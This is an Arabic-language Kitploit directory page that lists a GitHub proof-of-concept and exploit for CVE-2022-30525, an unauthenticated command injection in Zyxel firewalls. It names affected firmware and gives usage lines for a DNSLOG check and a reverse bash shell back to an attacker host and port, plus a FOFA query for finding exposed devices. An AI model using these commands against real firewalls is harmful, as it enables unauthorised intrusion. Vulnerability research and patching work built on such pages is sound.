Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-30525 — CVE-2022-30525 Zyxel ثغرة حقن أوامر في جدار الحماية POC&EXPC | Kitploit
أدوات/GitHubGitHub/west9b/cve-2022-30525
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Zyxel ثغرة حقن أوامر في جدار الحماية POC&EXPC

عرض المستودع
1233منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-30525 ثغرة حقن الأوامر في جدار حماية Zyxel

CVE-2022-30525 POC&EXP

المؤلف: 160team.west9B

يُستخدم فقط من قبل باحثي الأمن بإذن، مع الامتثال لقانون الأمن السيبراني. أي مشاكل تنشأ، تكون على مسؤوليتك الخاصة، ولا يتحمل المؤلف أي مسؤولية.

01-مقدمة أساسية

في 12 مايو 2022، أصدرت Zyxel إعلانًا أمنيًا لإصلاح ثغرة حقن الأوامر عن بُعد غير المصادق عليها (CVE-2022-30525) في أجهزة جدار الحماية الخاصة بها، بدرجة CVSS 9.8. توجد الثغرة في برنامج CGI لبعض إصدارات جدار حماية Zyxel، وتسمح بتنفيذ أوامر عشوائية على الأجهزة المتأثرة دون مصادقة.

النطاق المتأثر:

سلسلة ATP من البرامج الثابتة: 5.10-5.21 Patch 1

سلسلة VPN من البرامج الثابتة: 4.60-5.21 Patch 1

USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1

02-تعليمات الاستخدام

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

تنفيذ الأمر لهذه الثغرة لا يعرض مخرجات، لذلك يتحقق POC عن طريق طلب واجهة DNSLOG API. إذا كان هناك طلب DNSLOG، تكون الثغرة موجودة. لمنع النتائج الإيجابية الخاطئة بسبب تأخر الشبكة، يطلب التحقق DNSLOG بتأخير 10 ثوانٍ.

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

استغلال bash shell عكسي، بعد -m exp حدد IP و منفذ VPS.

usage_exp: ./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337

لقطات الشاشة

Image text Image text

المراجع

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

تنزيل الأداة